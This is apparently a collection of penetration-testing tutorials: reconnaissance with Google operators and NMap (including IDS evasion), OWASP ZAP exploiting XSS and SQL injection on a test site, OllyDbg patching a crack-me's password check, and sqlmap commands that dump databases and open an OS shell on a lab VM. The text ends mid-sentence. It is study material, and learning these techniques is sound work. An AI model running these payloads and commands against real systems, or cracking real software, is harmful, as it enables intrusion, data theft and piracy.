The main objective of the scanning work is to produce a report of the target's weaknesses. That report
will be used in the subsequent exploitation phase. The previous step showed which targets to aim for
during the scan, by answering questions like: What are the active hosts in the domain? What is
the network topology? With this initial information, the scan work can focus on finding out exactly
where to force an entrance.
The scan work can also be divided into two phases: a first one, where the most obvious (and often
unbelievable) weaknesses can be found with a search engine like Google, and a second, where possible
points of exploitation can be found with a tool like NMap. In summary, Google can be the first filter
that hints at something that should be investigated more closely using a scanning tool like NMap.
Some information is public on the internet by design, but other information may be exposed
inadvertently, and Google, or other search engines, can help find it. These search capabilities make
OSINT (Open Source Intelligence) viable, because the information is public, updated, and reliable. The
relations between people and companies can reveal a good weakness to exploit.
There are some good tools to have on your desktop. Some confirm, or find more information about, an IP
or DNS name already identified:
Name      Objective
WHOIS     Returns the DNS information associated with a DNS name and identifies the owner of the
          domain name.
Others make the job easier by correlating more complex information from different sources:
Name      Objective
MALTEGO   Searches and retrieves information from public sources and graphically shows the relations
          between them.
I2        Groups different information (personal, geographic, etc.) from various sources, making its
          analysis easier and more meaningful.
The Google search engine has many operators that, when used well, help find exactly what one is
looking for. Below are examples of how they can be used (ignore the quotation marks). This kind of
research is called Google Hacking.

Operator                   Objective
site:address               Ex: "site:microsoft.com -technet +Linux" only returns pages from
                           "microsoft.com" that contain the word "Linux" and do not contain the word
                           "technet".
inurl:word                 Ex: "site:microsoft.com inurl:file" will return pages from microsoft.com
                           that have the word "file" inside the URL, such as:
                           "https://msdn.microsoft.com/pt-br/library/system.io.file%28v=vs.110%29.aspx"
filetype:word or ext:word  Returns pages whose URL has a specific "word" as the extension of a file.
                           Ex: "site:microsoft.com ext:pdf inurl:tutorial" will return pages that
                           reference PDF files inside Microsoft's website and have the word "tutorial"
                           inside the URL, such as:
                           http://research.microsoft.com/en-us/um/people/simonpj/papers/haskell-tutorial/TasteOfHaskell.pdf

Google hacking, during the exploit phase, can find the weaknesses left behind by the careless; it
really still exists. Other examples of Google query operator usage can be found in a repository called
the GHDB (Google Hacking Database).
Figure 1: Sheet found in a governmental site that could be directly opened from its URL
Another interesting tool Google offers is Alerts, with which search robots can be created to send
e-mails whenever a search returns results. All available operators can be used in the alert definition.
A LITTLE ABOUT TCP/IP ADDRESS AND PORTS
(SOCKETS)
The internet is the field where the game of scanning is played, so since TCP/IP is its
communication protocol, it is a good idea to understand some concepts about it. TCP/IP is a set of
protocols and tools that controls communication between devices (computers) connected to the network,
additionally guaranteeing sessions and the delivery of all packets transmitted between them. If
information arrives corrupted, TCP manages the retransmission process by itself.
Another important feature is the use of sockets to implement multiple sessions over virtual
connections to applications. A socket is identified by an IP address and a port number; it is like a
connector to the application, a place through which information arrives or is sent. For example, a web
server like Apache, which implements HTTP, uses port 80 to receive requests for web pages. Any
application or high-level protocol uses a specific port: an FTP server uses port 21, Telnet uses 23,
HTTPS (HTTP Secure) uses 443, SQL Server uses 1433, all of them bounded by the upper limit of 65535
and the already reserved application numbers. Some applications may use a different port number to
provide a high-level protocol service that normally uses a well-known default port. For example, a web
server can serve pages over HTTP on another port, like 8081. In that case, to connect to this service
on a non-default port, it is necessary to give the port number explicitly, prefixed by ":"
(ex: http://site.com:8081).
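The non-default-port idea can be demonstrated with a throwaway local web server. In this sketch the OS picks the port (standing in for the 8081 of the example), and the URL must name it explicitly after the host:

```python
import http.server
import threading
import urllib.request

# Serve a trivial page on a non-default port (0 lets the OS pick one).
server = http.server.HTTPServer(("127.0.0.1", 0),
                                http.server.SimpleHTTPRequestHandler)
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

# The non-default port must be given explicitly after the host, prefixed by ":".
url = "http://127.0.0.1:{}/".format(port)
status = urllib.request.urlopen(url).getcode()
print(url, "->", status)

server.shutdown()
```

Leave the `:port` off and the client would try port 80 instead, where nothing is listening.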
It is important to know about sockets because, when NMAP scans for vulnerabilities, it looks for ports
that are visible from outside the organization's network border. At the fifth layer of the OSI Model,
called the Session layer, programs establish sessions using sockets. In conclusion, sockets are the
possible weaknesses and, to reduce the risk of intrusion, should not be exposed to the internet,
remaining protected behind a firewall.
Figure 2: TCP protocol stack and its high level protocols (HTTP, FTP …)
NMap is free to download from nmap.org. NMap has a lot of scan options and it is important to know which to use
according to the characteristics of each target.
SYN Scan → The "synchronize" initials may already be familiar from the DDoS attack style called SYN
flood, where the objective is to make the server run out of the resources used to answer requests.
During a normal TCP handshake, the client sends a SYN, the server answers with a SYN-ACK
(acknowledge), and the client answers back with an ACK. The attacker sends as many SYN packets as
possible and receives the SYN-ACKs, but never sends back the ACK, so the server keeps waiting for
those ACKs long enough to run out of resources. During the scan process, NMAP does not want to put the
target in trouble, but uses the same mechanism to deduce the following: if the server answers with a
SYN-ACK, the socket is alive; if the answer is a RST (reset), the socket is not responding; and if the
server does not answer at all, the socket is filtered.
TCP Scan → When the user does not have privileges to send raw packets, NMap uses the operating
system's connect system call to establish the connection.
UDP Scan → Since some sites do not pay attention to protecting UDP sockets, this is a good scanning
option. NMap will send a UDP packet to every socket on the target and, due to the high response times
involved, this method can run for a long time.
ACK Scan → This type of scan is a good choice for identifying filtered and unfiltered ports, because
even the simplest packet filter will let ACK packets pass.
Fragmented Packets Scan → The objective of this technique is to make it harder to identify what kind
of packet is traveling over the network. As a result, packet filters and intrusion detectors will let
the packets generated by NMap pass, allowing the discovery of more network details. To perform it, the
header of the IP packet is split, by default, across several fragments of 8 bytes each.
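What the TCP connect scan does under the hood can be sketched with plain sockets. This is an illustration of the technique, not of NMap's actual implementation, and for brevity it lumps non-responding (filtered) ports in with refused ones:

```python
import socket

def connect_scan(host, ports, timeout=1.0):
    """Classify each port as 'open' or 'closed' using a full TCP connect,
    roughly what NMap's -sT option does when raw packets are unavailable."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        # connect_ex returns 0 on success instead of raising an exception.
        results[port] = "open" if s.connect_ex((host, port)) == 0 else "closed"
        s.close()
    return results

# Demo against a listener we control on localhost.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
open_port = listener.getsockname()[1]

result = connect_scan("127.0.0.1", [open_port])
print(result)
listener.close()
```

A real scanner additionally distinguishes "filtered" (no answer before the timeout) from "closed" (an explicit RST), as NMap does in the SYN scan description above.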
Figure 4: Example of scan result with FTP Server started and stopped
The example above shows a comparison of two scan results. In the first, with the FTP server started,
NMap identified TCP port 21 as open. In the second, with the FTP server stopped, NMap identified port
21 as filtered because it did not respond. The command used restricts the scan to ports 21, 23 and 80
(-p T:21,23,80), using the TCP connect scan type (-sT).
Figure 5: Example of topology graphic and server characteristics
CONCLUSION
This article is a brief introduction to basic scanning techniques and presents the first steps to
begin research and study. There is a lot of information on the internet, and some environments come
already prepared for scanning purposes, like Kali. Kali is a Linux distribution configured for pen
testing, with many tools to perform a variety of scan types, that you can freely download. Good luck.
ABOUT THE AUTHOR:
REFERENCES:
• http://hackersforcharity.org/ghdb/
• http://nmap.org
HOW TO USE OWASP ZAP PROXY
FOR PEN TESTING WEB-BASED APPLICATIONS
by Cory Miller
The Open Web Application Security Project (OWASP) periodically releases its list of the top ten
vulnerabilities found in web applications. Some of the items on the list are Cross-Site Scripting
(XSS), SQL Injection, and Cross-Site Request Forgery (CSRF). These vulnerabilities continue to plague our
web applications today. In order to protect against these vulnerabilities, Penetration Testers
rely on tools which provide automated testing on web applications. To gain better visibility
into web applications, a Penetration Tester can leverage the OWASP Zed Attack Proxy (ZAP).
INTRODUCTION
In today's digital world, many different types of businesses are accessible from the internet,
including e-commerce, marketing, and banking. Whether we use the internet for making a purchase or for
banking, every time we access a website our browsers interact with an application hosted on a web
server. There are many working parts behind the scenes. In addition, those sites are not just used by
everyday people; they can also be used by hackers or criminals looking to exploit flaws that might be
present within the web application. Such vulnerabilities could potentially allow an attacker to gain
access to the system, potentially exposing private data.
OWASP Zed Attack Proxy (ZAP) is an easy to use penetration testing tool that can scan for
vulnerabilities. Just like its counterpart Burp Suite, ZAP is helpful in performing detailed analysis of
web applications. ZAP is a popular tool among Penetration Testers because it has a lot of support and
is integrated into the OWASP community. In this article we will focus on how we can leverage ZAP to
scan a website for vulnerabilities, some of the features, and attempt to reproduce a Cross-site
Scripting attack (XSS).
Before we begin diving into the features and use case examples, we will take a look at some of the
benefits to using ZAP and what other open source and commercial tools are available. One of the
most comparable tools is Burp Suite, which offers both a free and a subscription-based version. Burp
Suite is very similar to OWASP ZAP in the features it includes, such as spider and fuzzing
capabilities, and it also offers proxy functionality, which has proven very useful when looking at the
exchanges between the browser and the web application. It is my opinion that ZAP is a little more user
friendly for beginners, solely based on the fact that you can use ZAP's intuitive attack method,
whereas Burp requires a more in-depth understanding of its features and uses.
Some of the other tools available do not offer the same packaged capabilities as ZAP and Burp Suite
do, instead they are more focused on the individual topics. For example, Nikto and W3AF are used to
scan for known vulnerabilities and do not offer a proxy function. SQLmap is used to find and exploit
SQL vulnerabilities just like XSSer focuses on detecting Cross-Site Scripting vulnerabilities. As you
can see, there is no shortage of tools for a Penetration Tester; it really comes down to a matter of
preference and use case. ZAP utilizes the same techniques as some of the other tools while providing
all those features in one easy-to-install package. In the next section, we will discuss some of the
most common features in ZAP.
The latest version of ZAP is 2.4.3. ZAP can be installed on Windows, Linux, and Mac OS/X. ZAP
makes it easy for Penetration Testers and Security Professionals to locate vulnerabilities in web
applications with minimal intervention. Some of the features that ZAP offers are:
• Intercepting Proxy
• Automated Scanner
• Passive Scanner
• Brute Force Scanner
• Spider
• Fuzzer
• Port Scanner
One of the most useful features is the Quick Start feature. ZAP provides a complete list of potential
vulnerabilities in a web application, including what portion of the code is vulnerable. ZAP acts as a
non-transparent proxy, meaning that traffic is tunneled through while browsing the web application.
In addition to the non-transparent proxy features, ZAP also offers a way to assess the web application
through the Quick Start option. The Quick Start option uses a spider to actively crawl the web
application. ZAP has the ability to scan web applications both actively and passively, that is, with
or without manipulating the data.
Now that you have a little background on what ZAP can do, it's time to download and install it. ZAP
can be installed on Linux, Mac OS/X, and Windows, and is available at
https://github.com/zaproxy/zaproxy/wiki/Downloads.
Once downloaded, click on the installer file (Figure 1).
After ZAP is installed, we need to generate the ZAP SSL certificate. Since all communication is
proxied through ZAP, certificate verification for any sites using Secure Socket Layer (SSL) (HTTPS)
will fail and the connection will be terminated. To generate the certificate, open ZAP and select
Tools, then Options. On the left-hand side, select Dynamic SSL Certificates. Next, save the
certificate so it can be imported into the browser (Figure 2). The next section explains how to
configure Firefox with the SSL certificate.
(Figure 2). ZAP SSL Certificate.
For this article, we are going to configure Firefox but you can use any browser that you are more
comfortable with, just remember to configure it to connect through ZAP. As of this writing, the
current version of Firefox is 43.0.4. Now it is time to import the certificate. Open Firefox and
select the options menu. Once the menu is open, click on the Advanced section, select the Certificates
tab, and then View Certificates. Once the certificate manager opens, select Import and point it to the
saved SSL certificate. Make sure to check all three boxes to trust the root Certificate Authority
(CA) (Figure 3).
Now that the ZAP SSL certificate has been imported into Firefox we can proceed with pointing
Firefox to ZAP. To do so, we navigate to tools, options, then on the left hand side select advanced. On
the next screen, select Network, then Settings (Figure 4).
In the proxy section, we are going to enable manual proxy configuration, by default ZAP uses
127.0.0.1 as the HTTP proxy and 8080 as the port number (Figure 5).
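Pointing Firefox at 127.0.0.1:8080 is one way to route traffic through ZAP; the same routing can be scripted for automated testing. A minimal sketch with Python's urllib, which only configures the proxy (no request is actually sent here):

```python
import urllib.request

# ZAP's default local listener (Tools -> Options -> Local Proxy).
ZAP_PROXY = "http://127.0.0.1:8080"

proxy = urllib.request.ProxyHandler({"http": ZAP_PROXY, "https": ZAP_PROXY})
opener = urllib.request.build_opener(proxy)
# opener.open("http://webscantest.com/") would now be intercepted by ZAP,
# provided ZAP is running and its certificate is trusted for HTTPS sites.
print(proxy.proxies)
```

Any HTTP client that honors an explicit proxy setting (curl, requests, a headless browser) can be wired up the same way, which is how ZAP ends up seeing scripted traffic as well as interactive browsing.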
Now that ZAP is set up, let's take a look at a few of the different areas where you can pull
information and tweak settings. One of the most useful features is the filter section: when you browse
the web application, it is possible to pull in other pages that do not pertain to the application you
are testing. To clean up the tree view, simply right-click on the URL, select Include in Context and
then create a new context. This adds the URL to the scope, meaning ZAP will focus on that site. Right
above the tree window there is a bullseye button that, when clicked, filters the tree view to show
only in-scope items (Figure 6).
(Figure 6). Filter Option.
In addition to the filter and context options, you can also edit the field view on the below tabs to
include or exclude specific testing methods. By default, ZAP usually has the History, Alerts, and
Search fields displayed. You can add more by clicking on the green plus button and selecting from
a list of available fields (Figure 2). You can also remove the fields by clicking the small “x” on each
tab.
The gear icon on the top toolbar will open the options menu where you can tune some of the options,
such as active scanning threads, Fuzzer, Shortcut Keys and many other options (Figure 8). ZAP
certainly provides you with enough options and features to tweak it to your individual needs.
(Figure 8). Option Menu.
The last view that you need to understand for this tutorial is the request and response header fields
(Figure 9). This field allows you to see what types of HTTP requests have been sent to the web
application and the types of responses it provided back. This view is very important for understanding
the different techniques used, such as the SQL Injection or Cross-Site Scripting parameters that have
been sent to the web application.
At this point, Firefox will send all traffic through ZAP. Open up Firefox and navigate to URL
http://webscantest.com/crosstraining/products.php. This site was set up to test scanners as well as
the ability to try some common attacks, such as Cross-Site Scripting (XSS) and SQL Injections. After
you navigate to the products page, click on the shovel entry and select submit my review (Figure 10).
(Figure 10). Shovel Page.
At this point ZAP will have a directory structure as well as some alerts from browsing the website
(Figure 11). Under the alerts section, you will find that web browser XSS protection is not enabled. To
verify, we will attempt a Reflected Cross-Site Scripting attack into the description field on the shovel
review page (Figure 12).
(Figure 12). Cross-Site Scripting Example.
Once you enter the script into the description page, click the submit button (Figure 12). Click on the
back to reviews link on the bottom of the page. Once the page loads, you will see a dialog box pop up
with (‘XSS’). This type of attack is referred to as a Reflected Cross-Site Scripting (XSS) attack (Figure
13). Reflected Cross-Site Scripting (XSS) is also known as a non-persistent cross-site scripting attack.
The Reflected XSS vulnerability is one of the more common types of attack seen today. It is present
when HTML form submissions or HTTP query parameters are passed immediately to server-side scripts and
reflected back without any proper input validation.
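The root cause can be sketched in a few lines. The template below is a hypothetical stand-in for whatever the review page does server-side; the point is the contrast between echoing input raw and escaping it on output:

```python
import html

TEMPLATE = "<p>Review: {}</p>"  # hypothetical server-side template
user_input = "<script>alert('XSS')</script>"

vulnerable = TEMPLATE.format(user_input)         # the script reaches the browser intact
safe = TEMPLATE.format(html.escape(user_input))  # rendered as inert text

print(vulnerable)
print(safe)
```

In the safe variant the angle brackets arrive as `&lt;` and `&gt;`, so the browser displays the payload instead of executing it, which is why output encoding (alongside input validation) is the standard defense.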
The test we just performed validates that the web application is vulnerable to XSS attacks. Finally, we
can now view the attack in ZAP by clicking on navigation menu, selecting the product review sub
page and clicking on the POST:review.php(Submit, Description, Email, Name) entry (Figure 14). On
the right hand side, you will see an encoded version of the script we just injected into the description
field under the request header.
(Figure 14). ZAP POST View.
So there you have it. You now have learned some of the features that are useful when testing a web
application and how to setup ZAP to intercept traffic between Firefox and a web application as well
as one of the ways to verify a Cross-Site Scripting vulnerability.
Before we move onto the next section, it is important to note that you can also use ZAP for parameter
injections. Parameter Injections involve adding code into the parameter fields within the response.
This technique can be used to bypass client-side checks. To do so, you can utilize the ZAP break
feature to intercept a request, include the modified data and forward it back to the web application.
Now we will take a look at how this is done.
Browse to URL http://webscantest.com/crosstraining/aboutyou2.php, put some information in the
about-you section, and click submit. You should see a POST entry in ZAP (Figure 14-1). Right-click on
the POST entry, select Break, and click save (Figure 14-2).
(Figure 14-2) Manipulated Response Body.
Reload the page and create another entry. Once you submit the about-you form, you will notice that ZAP
will flash, waiting for the response to be forwarded. Let's go ahead and add the example JavaScript we
used for the previous XSS attack. Click on the double arrow and watch as we inject the code into the
web application (Figure 14-3).
As you can see, we were able to get the same results as the previous exercise by displaying our alert
message of XSS. The last two exercises only scratch the surface as to what ZAP is capable of doing.
Penetration Testers must be able to overcome challenges they are faced with in order to ensure that
the web application has been properly tested. In the next section, we will discuss SQL Injections and
how we can leverage the fuzzer in ZAP.
Now that we have setup ZAP and had a chance to exploit an XSS vulnerability, let’s take a look at how
we can use ZAP to find and exploit a SQL vulnerability. Structured Query Language (SQL) is used to
query and administer databases such as Oracle, Microsoft SQL, and MySQL. A SQL Injection attack
involves modifying SQL statements in a malicious manner where they are entered into a field within
a web application. If input validation checks are not in place, the SQL query can edit, delete, or
expose information from the backend database, making this a very dangerous attack. In fact, SQL
injections are so common today that OWASP lists injection as the number one risk. We will also be
using the fuzzer to carry out our SQL Injection checks. Fuzzing is a technique used to find code
errors within the web application; it operates by injecting semi-random data into a selected field.
Now, navigate back to ZAP and on the left side, we should see the site as well as a folder named
ShutterDB. Expand that folder and click on the POST entry. On the right hand side, you will notice
that within the response body we see name=Rake (Figure 16).
This is our search term listed in the response body. Right click on the word Rake and select Fuzz. A
dialog box will appear. Click on payloads on the right hand side (Figure 17).
(Figure 17). Fuzz Option.
Another box will appear. Now we need to tell the fuzzer which injection types we would like it to try.
Click on Add, then set the drop-down to File Fuzzers. Expand the jbrofuzz directory and scroll down to
Injection, then Oracle SQL Injection (Figure 18).
Now we should see the payload in the box. Add it to the fuzzer and click OK. At this point, we have
chosen to run the fuzzer against the search parameter Rake with the Oracle SQL Injection payload.
Click Start Fuzzer. At the bottom of the ZAP screen, you can see the fuzzer go through the checks
included in the selected payload (Figure 19).
It is important to note that not all attempts will be successful. For this exercise, we are going to
select the line with 'or '1'='1. Directly above the history box, you can also see the injection
parameters used in the request sent to the web application. Now it's time to see if that SQL injection
will work. We are going to type the example below into the search field on the website (Figure 20).
Once you type in the above command, click select. As you can see, we just caused the database to dump
a list of all the products; our injection was successful. ZAP offers many different fuzzing payloads
for the various SQL dialects. The fuzzer is a good start for taking some of the manual effort out of
trying different SQL injection attacks. You can also compile a custom list of commands for a fuzz
scan, based on your specific needs.
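Why `' or '1'='1` dumps the whole product list can be demonstrated with a throwaway SQLite table. The table and column names here are made up (the site's real backend is unknown); the vulnerable pattern is the string-concatenated query:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (name TEXT)")
db.executemany("INSERT INTO products VALUES (?)",
               [("Rake",), ("Shovel",), ("Hoe",)])

def search_vulnerable(term):
    # Vulnerable: user input is concatenated straight into the SQL statement,
    # so the WHERE clause becomes: name = '' or '1'='1'  (always true).
    query = "SELECT name FROM products WHERE name = '{}'".format(term)
    return [row[0] for row in db.execute(query)]

print(search_vulnerable("Rake"))         # ['Rake']
print(search_vulnerable("' or '1'='1"))  # every row in the table
```

The fix is to use parameterized queries, e.g. `db.execute("SELECT name FROM products WHERE name = ?", (term,))`, which keeps user input from ever being parsed as SQL.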
SUMMARY
This article only touches the surface of the OWASP Zed Attack Proxy (ZAP). ZAP has proven to be a very
valuable tool in a Penetration Tester's arsenal, not only because of its widely adopted support but
because its features are intuitive and easy to run. Tools like ZAP are truly beneficial during the
initial testing phase because they provide the Penetration Tester with detailed information about the
web application, hidden directories, and the potential vulnerabilities found. In addition to
intelligence gathering, ZAP is also capable of executing attacks on vulnerabilities listed in the
OWASP Top Ten. The more we rely on web applications, the more likely they are to be targeted for
malicious intent. It is critical to understand how our browsers interact with web applications and the
different ways we can find critical flaws in the code. Finding these flaws early in the development
lifecycle will help prevent web applications from leaking private information that can hurt both the
customer and the business. The best way to achieve this is to use the tools available in both the open
source and commercial communities.
REFERENCES:
ON THE WEB
3. OWASP ZAP Wiki page: https://github.com/zaproxy/zaproxy/wiki/Introduction
4. OWASP Top Ten List: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2013
BIBLIOGRAPHY
Journey to Reverse Engineering -
Unraveling key to software
reversing & malware analysis
by Samrat Das
● Source code is already available for the software, but proper documentation is no longer valid and
requires remodelling.
● No source code is available for the software; the attempt to recover a possible source code then
becomes reverse engineering.
● The most interesting from a "hacker's" perspective: removal of copy protection ("cracking") and
modifying the logic of the code to accept an arbitrary license (patching).
My focus will be on the third part, since it will be most fascinating for readers!
Malware analysis is another interesting use of reversing: the technique of reversing a malware's code
to inspect its behavior and, furthermore, create a corresponding digital signature.
A reverse engineer's toolkit is largely based on open source tools, as well as some closed source
ones; in simple terms, we use debuggers, disassemblers, and decompilers.
My favorite tool is OllyDbg, a free Windows debugger widely used for reverse engineering, as well as
an important ally in malware analysis.
In this article, my focus will be on a hands-on tutorial for patching an exe file to accept any serial key!
• Ollydbg (http://www.ollydbg.de/)
• A crack-me for demonstration. You can download loads of crack-mes for hands-on practice from
http://crackmes.de/
Some important concepts:
1) 32-bit and 64-bit applications:
A 32-bit application normally means software that uses the 32-bit linear address space (or flat
memory model) possible with the 80386 and later chips, while 64-bit applications are those using a
64-bit address space for better performance with modern hardware. Most computers still run 32-bit
applications, since they have lower hardware requirements and legacy support.
2) Registers:
In a computer, a register is one of a small set of data holding places that are part of a computer
processor. A register may hold a computer instruction, a storage address, or any kind of data (such as
a bit sequence or individual characters).
32-bit data registers: EAX, EBX, ECX, EDX. Lower halves of the 32-bit registers can be used as four
16-bit data registers: AX, BX, CX and DX.
3) Disassembler:
A disassembler is a computer program that translates machine language into assembly language—the
inverse operation to that of an assembler.
4) Decompiler:
A decompiler is a computer program that takes as input an executable file, and attempts to create a
high level, compilable source file that does the same thing. It is therefore the opposite of a compiler,
which takes a source file and makes an executable.
5) Debugger:
A debugger or debugging tool is a computer program that is used to test and debug other programs.
6) Crackmes:
In simple words, a crack-me is a small program designed to test a programmer's reverse engineering
skills. They are programmed by other reversers as a legal way to "crack" software, since showing how
to crack commercial software is illegal; Crackmes are a great way to approach the same in legitimate
fashion.
Most commercial software is cracked in a similar fashion, though with recent higher-end software the
code is usually "obfuscated" or "packed" to hinder reversing (simply put, security measures applied
as anti-reversing).
Let me show you how a simple crack-me exercise, which has a particular serial key (obviously unknown
to me), can be patched to make it accept any serial key.
Just as a simple note, any application can be patched/cracked in multiple ways. Some of the
situations I have worked on in the past included:
3) Decipher the serial-key generation and create a key-generator to produce infinite product keys
As you can see, here is a sample crack-me, “passwordapp.exe”. Upon clicking the application, it asks
us to enter a password for access.
As normally expected, we will get a warning due to wrong password: Not authorized.
Now to patch this exe, we open “Ollydbg” to fire up the same app inside the debugger to analyze it.
For beginners, here is a short intro to OllyDbg, to help you get familiar with it.
1) CPU Window: The main workspace, where we will perform step-by-step code analysis
2) Registers: The part of the window which contains the 32-bit/64-bit registers and flag
information
4) Memory Stack: The stack display pane, showing comments and the addresses in memory.
Click File /Open and the below box will pop up, select the appropriate directory and launch the app
inside the debugger.
Once the application loads inside the debugger, we can see the app inside the window with all the
assembly instructions visible.
As part of our inspection, we need to run the application again, but this time inside the debugger, to
inspect and analyze its responses. Go to the Debug menu and click Run. The application will again
run inside OllyDbg. As usual, the application waits for the user to input the password.
To test the application logic, we will again enter a random password as input.
As soon as we again enter a random password, we are greeted with the same error as before.
However from a reverse engineer’s perspective, the secret is that the error will no longer be a fuss but
an ally for us!
In simple applications such as these, often THE KEY TO REVERSING IS FINDING THE
ERROR MESSAGE!
Here, just note the error message, which says we are unauthorized to use the application. Once we
close the error message, right click inside the console window and choose Search for -> All
referenced strings. We do this because we will now hunt for the error message we just
encountered.
After clicking All referenced strings, we will get a text box, where we will type the error message.
Once done, we get a window where all the ASCII strings of the application are present.
Once we double click on the message in the results window, we will be taken back to the main console.
Observing closely, go a little above the line of the error message, looking for a jump instruction.
Here you can find the following instruction: “JE SHORT Password.00457728”
JE is a conditional jump which means that if the condition is right, then it will jump to 00457728,
which leads us to the message "You are not authorized to use the application" and if the condition is
not satisfied it just continues reading the code.
There are two simple options to patch this:
• Fill it with NOPs (No Operation) and make this conditional jump not work
• Change JE SHORT Password.00457728 to JNE SHORT Password.00457728.
JNE (Jump if Not Equal) inverts the logic: a correct password would now trigger the error
message, while an incorrect password leads to the success message.
Again, the application will ask us to enter the password, but this time the wrong password, 1111,
will be accepted: the application skips the authenticity check and jumps directly to the "you
are authorized" section, demonstrating successful patching of the app.
Now to permanently modify the app to accept any password, simply save the modified exe.
Right click on code window-> "copy to executable" -> "All modifications" -> Copy all-> "Save file".
There is much more to reverse engineering, including Dependency Walker, PE (Portable
Executable) analysis, UPX decompression, malware analysis... huge and broad topics, which I will
show in later articles!
REFERENCES:
1. https://en.wikipedia.org/wiki/Reverse_engineering
2. http://www.ollydbg.de/download.htm
3. http://www.tutorialspoint.com/assembly_programming/assembly_registers.htm
4. https://en.wikipedia.org/wiki/Debugger
5. https://en.wikipedia.org/wiki/Decompiler
6. https://en.wikipedia.org/wiki/Disassembler
HOW TO HACK WITH SQLMAP
Performing SQL injection
by Sumit Kumar Soni
SQL Injection is one of the top vulnerabilities in the OWASP Top 10. It has been around since the
1970s. Finding and exploiting SQLi needs a specialized skill set, which requires a deeper understanding
of web technologies, the backend database, and the mechanisms used to retrieve data from the DBMS, e.g.
Structured Query Language (SQL). Over time, the techniques for exploiting SQL Injection have
been improved. With the advent of programming languages, these techniques have been incorporated
into tools that can be used by naïve users.
INTRODUCTION
In today's world, Web and database technologies keep changing and the threat landscape is evolving,
posing the risk of new vulnerabilities, whereas older vulnerabilities, like SQLi, are still prevalent. With the
help of automation tools, like SQLMAP, it's becoming much easier for an attacker to exploit such vulnerabilities
while developers are still trying to fix the existing code. In this article, we will explore how to use SQLMAP
effectively to identify and exploit SQLi without being worried about the nitty-gritty of SQL injection.
WHAT IS SQL INJECTION?
SQL injection is an injection attack wherein an attacker can execute malicious SQL statements that
control a web application’s database server.
SQLMAP is one of the most popular and powerful SQL injection automation tools out there. Given a
vulnerable HTTP request URL, SQLMAP can exploit the remote database and do a lot of hacking, like
extracting database names, tables, columns, all the data in the tables, etc. It can even read and write
files on the remote file system under certain conditions.
SQLMAP is included in pen testing Linux distros, like Kali Linux, BackTrack, etc. On other distros, it
can be simply downloaded from http://sqlmap.org/.
SETUP
For this article, we will be using Kali Linux. Kali has SQLMAP pre-installed. The image
can be downloaded from https://www.kali.org/downloads/
I am using Samurai as the vulnerable target. Its virtual machine can be downloaded from
https://sourceforge.net/projects/samurai/files/
For this article, we are using a vulnerable script on Samurai named vulnscript, so
our target URL will be http://vulnscripts/sqli.php?name=a
BASIC TEST
This test will show whether your target is vulnerable to SQLi or not.
Manual test: if we send name=’1 or 1=1 to our web application, we can clearly see that it gives us an
SQL syntax error and also gives away the database name. This is an indication that this application
may be vulnerable to SQLi.
With SQLMAP: we can confirm our results:
sqlmap -u http://vulnscripts/sqli.php?name=a
In its output, the following line would indicate that the parameter name might be vulnerable and
that this application is using MySQL.
If we continue with our tests, it will show us crucial details about the exact version of MySQL and
also confirm that the parameter name is vulnerable to SQLi.
RECONNAISSANCE
For any pen testing project, the first step is to gather as much information as we can about
the target. Once we have confirmation that our target is vulnerable, we can utilize
SQLMAP to get further information.
Database version:
With the -b argument, SQLMAP can get the version information of the database.
sqlmap -u http://vulnscripts/sqli.php?name=a -b
Discover Databases:
Once SQLMAP confirms that a remote URL is vulnerable to SQL injection, and it is exploitable, the
next step is to find out the names of the databases that exist on the remote system. The "--dbs"
option is used to get the database list.
sqlmap -u http://vulnscripts/sqli.php?name=a --dbs
Get data from a table:
Now comes the most interesting part, extracting the data from the table. Notice that SQLMAP also
offers a dictionary-based attack to crack the password hashes, and that it creates a CSV file
containing the dumped data for easy analysis. If we want to get data from specific columns, we
can do it by using -C column_name. For example, if we want to dump data from the id and login
columns, we have to use the following command:
Note that we have used --is-dba to know whether the current user has DBA privileges or not.
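The commands above appeared as screenshots in the original; a sketch of typical invocations, where the database and table names are assumptions (the real names come from the --dbs/--tables output):

```shell
# Dump a whole table (database and table names are hypothetical placeholders)
sqlmap -u "http://vulnscripts/sqli.php?name=a" -D appdb -T users --dump

# Dump only the id and login columns, and check whether the current user is a DBA
sqlmap -u "http://vulnscripts/sqli.php?name=a" -D appdb -T users -C id,login --dump --is-dba
```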
ADVANCED ATTACKS WITH SQLMAP
So far, we have used SQLMAP to get basic information about our target. We can leverage
SQLMAP to perform further attacks, like reading any file or executing any SQL statement.
Getting a shell:
You can use SQLMAP to get a shell on the target system using the --os-shell option, or you can
execute a system command using --os-cmd=OSCMD
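As a sketch, the two options just mentioned look like this (target URL from the article; the command passed to --os-cmd is just an example):

```shell
# Interactive OS shell via the SQL injection
sqlmap -u "http://vulnscripts/sqli.php?name=a" --os-shell

# Or run a single system command on the target
sqlmap -u "http://vulnscripts/sqli.php?name=a" --os-cmd=id
```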
Note that your mysql database user should be able to write files to a web-accessible location, or
else you may not be able to get the shell. If you are using the Samurai VM, then you have to remove
the mysql profile from AppArmor, or else AppArmor will prevent mysql from writing the file.
Exploitation of SQL injection depends highly on the logic of the application and the way it parses and
supports the various parts of the HTTP request. SQLMAP can customize these parts of a request.
Attacking a GET method is simple, but any application that uses the POST method can also be
vulnerable to SQL injection through its POST parameters. To test a parameter in a POST request,
you have to use the --data option.
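A sketch of testing a POST parameter with --data (the endpoint and parameter name are assumptions; sqlmap injects into each key=value pair supplied):

```shell
# Test the POST body parameter "name" for SQL injection
sqlmap -u "http://vulnscripts/sqli.php" --data="name=a"
```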
In many cases, simply running SQLMAP may not provide the desired results, as the SQL injection
may not be present in the URI query parameter, or some protection mechanism, like a WAF,
might be blocking some SQL injection attacks. In such cases, we can increase the attack
surface by setting the --level and --risk parameters.
Level: SQLMAP supports up to five levels, and each level increases the attack surface by including
more injection points and increasing the number of requests and payloads.
Level 1: Only parameters of the request are tested
Level 2: HTTP Cookie header values are also tested
Risk: This option requires an argument which specifies the risk of tests to perform. There
are three risk values.
Risk Comments
We can tell SQLMAP which parameter or header to test with the -p option, which portion of
the URL to inject into by marking it with *, and which parameters or headers we don't want to test
with the --skip option.
Note that we cannot use -p and --skip at the same time.
If you are not worried about time or data destruction, then the following command will dump
